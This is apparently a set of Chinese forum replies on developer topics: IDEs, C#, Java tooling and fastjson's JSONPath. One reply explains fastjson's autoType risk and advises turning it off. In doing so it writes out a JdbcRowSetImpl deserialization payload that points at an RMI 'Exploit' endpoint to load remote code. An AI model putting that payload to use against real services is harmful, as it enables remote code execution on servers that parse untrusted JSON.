基本的序列化 /反序列化都有类似漏洞，关 authType 保平安，那玩意儿除了 RPC 之外，其它应用场景真的很少

fastJSON 几乎所有的漏洞都和 autoType 有关，这玩意儿大部分都用不到，关了之后就没啥问题，它主要解决的是反序列化的类不确定，比如 {"@type":"com.abc.biz.Label","name":"","value":""}，那么反序列化的时候就会去用 classLoader 加载 com.abc.biz.Label 这个类，如果这个类被故意攻击，用到了 jdbc 里面的类，然后就比较危险了，比如 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
就能加载远程 dataSource 了，个人建议能关 autoType 就关掉，想用的话开白名单模式

idea 比 vscode 强太多了，vsc 看着很轻，很多插件一安装比 idea 卡多了

上班 java/vue ，下班 java/vue/小程序 /node

node 确认报错不优化，有时候还是底层的问题，不过拿来做轻量服务端美滋滋

一般不交流，都是自己偷偷的看 github trend 看看有没新轮子

dart 写法不太好，嵌套太多了

react 写起来不像传统前端

无解，我也写了一个基于 AST 的编译期 AOP 库，仅支持 java8 后面的版本都难得去兼容，api 说没就没了

我买的亿图终身版

NoSQL + SQL = MySQL

试试 C# 吧，配合 VS 直接起飞🛫

electron 吧，不过这又不算浏览器了，算 C/S 了

钉钉挺好的，消息设置把所有的账号推送关了，然后钉钉机器人、自定义工作台都非常好用的

C# 满足你的所有幻想
async/await 、EF 、LINQ 爽的一批

@sciel java 也有 label 语法不过只能用在 break 不能 goto （有语法，没实现），goto 设计上并不优雅，建议用闭包好点

@oneisall8955 FastJSON 的 JSONPath https://github.com/alibaba/fastjson/wiki/JSONPath
当然如果了解 Groovy 4.0 目前也有 GINQ 了（对比 C# 的 Linq ）

@Alexliu 你这个还真的很好解决，有 JSONPath ，无视空指针，
JSONObject origin = JSONObject.parseObject("...");
boolean isEqual = Objects.equals(JSONPath.eval(origin,"$.data.nation"),"印度尼西亚");

JAVA 虽然啰嗦，包路径很长，但是包管理方面，目前除了 nuget 感觉能和 maven/gradle 有的一拼其它语言都不太行，比如 npm/go module/Conda(pip) 等等